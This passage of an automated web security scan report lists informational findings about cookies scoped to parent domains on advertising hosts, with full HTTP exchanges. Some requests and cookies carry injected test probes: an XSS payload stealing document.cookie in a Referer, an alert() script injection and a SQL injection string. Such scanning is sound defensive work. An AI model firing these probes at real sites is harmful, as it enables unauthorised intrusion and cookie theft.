Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 02:25:39 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


15.39. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=8500755&c3=3720565304d55bd8eb4bad&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 02:28:05 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 02:28:05 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

15.40. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=538064&ev=6731d4ad-7dae-4402-b507-a0bc233d79fb HTTP/1.1
Host: bh.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: V=ZZVrXBMk1mFi; cwbh1=996%3B09%2F04%2F2011%3BFACO1%0A3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5; pb_rtb_ev=1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0; C2W4=3ncqaSewwHBKMpwXEV2xPrPwuGXdzMM__jVZBsuS4rDtkvyKd_yspGw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Cache-Control: no-cache, no-store
Set-Cookie: V=ZZVrXBMk1mFi; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 03:58:56 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 03:58:56 GMT; Path=/
Content-Type: image/gif
Date: Sun, 04 Sep 2011 03:58:56 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

15.41. http://bid.openx.net/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json?c=OXM_41207221382&pid=05eaa309-64d4-c0a7-d349-bc1b1d68d17f&s=728x90&f=0.85&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&cid=oxpv1%3A34-632-1929-2023-5730&hrid=edb2a1dc7ff395103b661a785688d648-1315103288 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1315106840; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_41207221382({"r":null});

15.42. http://c7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=305&g=20&a=494&s=1&t=r HTTP/1.1
Host: c7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B809,20|10_1#365Z3_1#392:305,20|145_2#371Z458_1#371; FFBbh=962B809,20|10_1#0Z3_1#15:305,20|145_2#3Z458_1#0; ZEDOIDX=5; FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'; FFcat=767,33,40:767,4,94:826,471,9:767,4,9:767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0; FFad=0:0:0:0:0:0:0:0:47:1:1:0:1; aps=2; FFMCap=2457960B933,196008:826,114248|0,1#0,24:0,1#0,24; PI=h842216Za680391Zc826000471,826000471Zs318Zt1246

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: FFAbh=977B305,20|494_1#365;expires=Sat, 03 Dec 2011 03:59:04 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=977B305,20|145_2#0Z458_1#0Z494_1#0:809,20|3_1#0Z10_1#0;expires=Mon, 03 Sep 2012 03:59:04 GMT;domain=.zedo.com;path=/;
ETag: "91967049-de5c-4a8e112997f00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=7190
Expires: Sun, 04 Sep 2011 05:58:54 GMT
Date: Sun, 04 Sep 2011 03:59:04 GMT
Connection: close

GIF89a.............!.......,...........D..;


GIF89a.............!.......,...........D..;

15.43. http://cas.criteo.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/afr.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /delivery/afr.php?zoneid=2873&ct0=http://yads.zedo.com/ads2/c?a=680391%3Bn=826%3Bx=2309%3Bc=826000471,826000471%3Bg=172%3Bi=0%3B1=99%3B2=1%3Bs=318%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=mLs5ThcyantsGCRD8ld6EMRU~080311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bp=8%3Bf=842351%3Bh=842216%3Bo=20%3By=305%3Bv=1%3Bt=r%3Bl=1%3Bs%3D318%3Bu%3DmLs5ThcyantsGCRD8ld6EMRU%7E080311%3Bz%3D0.4584487103923105%3B3%3Dz4-633%3Bk%3D HTTP/1.1
Host: cas.criteo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: uid=6731d4ad-7dae-4402-b507-a0bc233d79fb; udc=*1AjVT%2bgfw%2f8PyH2Istroh8g%3d%3d; uic=*1pOlwoshvAW2x3Oz%2bjok0cvVUTldU9thEXDVJHERJCsS8Qa8h95CnNUGIZvfT3E7MxvviQAdwbClCyEye0669isBI09H1R%2bKRO%2fltWpPRjN8%3d; evt=*1y97%2bNEPoN61o4EOCN%2fR2J9xVlHZMgVk%2b%2b2CwFGGZfIU%3d; dis=*1qWp1fsD%2bNdFnAtZ8%2baXsozp2l%2bVc4bwCpvGo36v6yzYl0vr%2b2rjd5s8HTnWLQ9vMdXMCedmlDMU1pVu7re3OqNSH03%2b%2fM819k1%2fHITjOJ99Qw4xwyEiIgha04DWLoK6z%2ftKYTIM%2bWvQpq6GH7Cf6THfb8s6N7d8wMlE1BAjK%2bDHApUIrLHRIWZaa1LvF56sc8LiTQybietPPncAzstNhBe%2baDkL8RY%2bTFbyxwc4wWOtAD8BXpV3Cz%2fiiH%2bVSWcx0rMIjfsHkOqahM925DOtINv%2b5GBrED6nMhkSLKihoDycCzgwK0V924PtbaS64eEp7pATGcjXGxFLRtaKsTJllUarZKLj%2blLzkQoSSdQl2IgEDKA2%2fEGzXqNG5Iw%2fnmBmo6CrXMAegC0CK3gdYN%2b9DnZN2Cfy1%2b4%2blkWJ4jnK5p6TQ36wYJrd9vjipwogdRUCTqKEM3BvjqUQfJ0nea7i6vfabzsxKam14f%2fi5q8J2VF2V6DewZNzR%2f5365qR2sDhJWkbOphSWIYmULMBJPmZneFkaco3LrTUxUAqI3%2brS7h8bDHumnJE%2fp2b6uo%2b9XJRy%2fhw%2bC7HcUnCJHPYM0Scri9FFUNs5fbiASA4wjgT53CRkUy0COj5OZSzb96RLeBPIAU8O5IHm0fDHfL3qnOXeEY19u0QsnKNz0kXGI9w9M0Q%3d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Sun, 04 Sep 2011 03:56:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: lbdis=; domain=.criteo.com; expires=Sat, 03-Sep-2011 03:56:54 GMT; path=/
Set-Cookie: OACBLOCK=; expires=Tue, 04-Oct-2011 03:56:54 GMT; path=/
Set-Cookie: OACCAP=; expires=Tue, 04-Oct-2011 03:56:54 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Set-Cookie: udc=*1ZF0W7Qh%2bkwR8H0jq3%2blTcFxpLyq4t52c%2f4ZgAzCu7Lo7oFeIs3JB5PilT4h9Nnd2Ed16pEHbTzLtM%2fX9HB5hnQ%3d%3d; domain=.criteo.com; expires=Sun, 04-Mar-2012 04:56:54 GMT; path=/
Set-Cookie: udi=*1ST63u%2b2MeboKImU0y8lpwQ%3d%3d; domain=.criteo.com; expires=Mon, 05-Sep-2011 03:56:54 GMT; path=/
Content-Length: 5222

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<div
...[SNIP]...

15.44. http://clk.atdmt.com/MRT/go/343014976/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /MRT/go/343014976/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/343014976/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.microsoft.com/windows/new-pc/detail.aspx?pc=samsung-series-9
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:6be1/2618b:f7d9/2b514; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:a3fb237/2618b/109b4b10/6be1/4e62faef:dac239a/2b514/1471fe40/f7d9/4e62faef; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 04 Sep 2011 04:13:35 GMT
Connection: close


15.45. http://clk.atdmt.com/goiframe/171946551/278612752/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /goiframe/171946551/278612752/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/171946551/278612752/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.yahoo.com
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:f7d9/2b514:6be1/2618b; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:dac239a/2b514/1471fe40/f7d9/4e62e827:a3fb237/2618b/109b4b10/6be1/4e62faef; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 04 Sep 2011 04:13:35 GMT
Connection: close


15.46. http://clk.fetchback.com/serve/fb/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 04:13:37 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315109617_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 04:13:37 GMT; Path=/
Set-Cookie: cre=1_1315109617_34021:68285:1:12332:12332_34024:68283:2:12566:12658_34024:68292:2:131454:131536_34023:68293:1:132167:132167; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 04:13:37 GMT; Path=/
Set-Cookie: clk=1_1315109617; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 04:13:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 04:13:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://default.com
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif


15.47. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/1302/egc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R53_7/jsc/1302/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R53_7/jsc/1302/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851,234927,234926,234925,199879:933,196008:767,218791:0,0|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:2,1#0,24:0,1#0,24]]>>:0,1#0,24:0,0#0,0;expires=Tue, 04 Oct 2011 04:14:45 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2185459
Expires: Thu, 29 Sep 2011 11:19:04 GMT
Date: Sun, 04 Sep 2011 04:14:45 GMT
Connection: close



15.48. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/933/egc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R53_7/jsc/933/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R53_7/jsc/933/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851,234927,234926,234925,199879:933,196008:767,218791:0,0|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:2,1#0,24:0,1#0,24]]>>:0,1#0,24:0,0#0,0;expires=Tue, 04 Oct 2011 04:14:52 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=912762
Expires: Wed, 14 Sep 2011 17:47:34 GMT
Date: Sun, 04 Sep 2011 04:14:52 GMT
Connection: close



15.49. http://d7.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/egc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R53_7_5/jsc/767/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R53_7_5/jsc/767/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851,234927,234926,234925,199879:933,196008:767,218791:0,0|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:2,1#0,24:0,1#0,24]]>>:0,1#0,24:0,0#0,0;expires=Tue, 04 Oct 2011 04:14:53 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1837600
Expires: Sun, 25 Sep 2011 10:41:33 GMT
Date: Sun, 04 Sep 2011 04:14:53 GMT
Connection: close



15.50. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=9&q=&$=&s=0&z=0.6926130542997271 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFgeo=5386156; aps=1; FFMCap=2457900B1185,234056:933,196008|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFad=0:0:0:0:0:0:0; FFcat=767,4,41:933,56,15:1302,202,9:826,471,14:767,4,14:1185,589,14:305,825,15

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'$767:e210c;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,9:767,4,9:767,4,41:933,56,15:1302,202,9:826,471,14:767,4,14:1185,589,14:305,825,15]]>>;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:1:0:0:0:0:0'%20and%201%3d1--%20:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=147
Expires: Sun, 04 Sep 2011 02:46:06 GMT
Date: Sun, 04 Sep 2011 02:43:39 GMT
Content-Length: 5163
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='e210c';va
...[SNIP]...

15.51. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=5&d=9&q=&$=&s=0&z=0.45356627337666533 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369; FFAbh=950B809,20|10_1#365Z3_1#392:305,20|145_2#371Z458_1#371; FFBbh=962B809,20|10_1#0Z3_1#15:305,20|145_2#3Z458_1#0; ZEDOIDX=5; FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'; FFcat=767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0; FFad=0:0:0:0:47:1:1:0:1; aps=2; FFMCap=2457960B933,196008|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457960B933,196008:826,114248|0,1#0,24:0,1#0,24;expires=Tue, 04 Oct 2011 02:36:30 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,471,9:767,4,9:767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0:0:0:0:47:1:1:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=25
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:36:30 GMT
Content-Length: 4307
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCu
...[SNIP]...

15.52. http://d7.zedo.com/bar/v16-504/d2/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

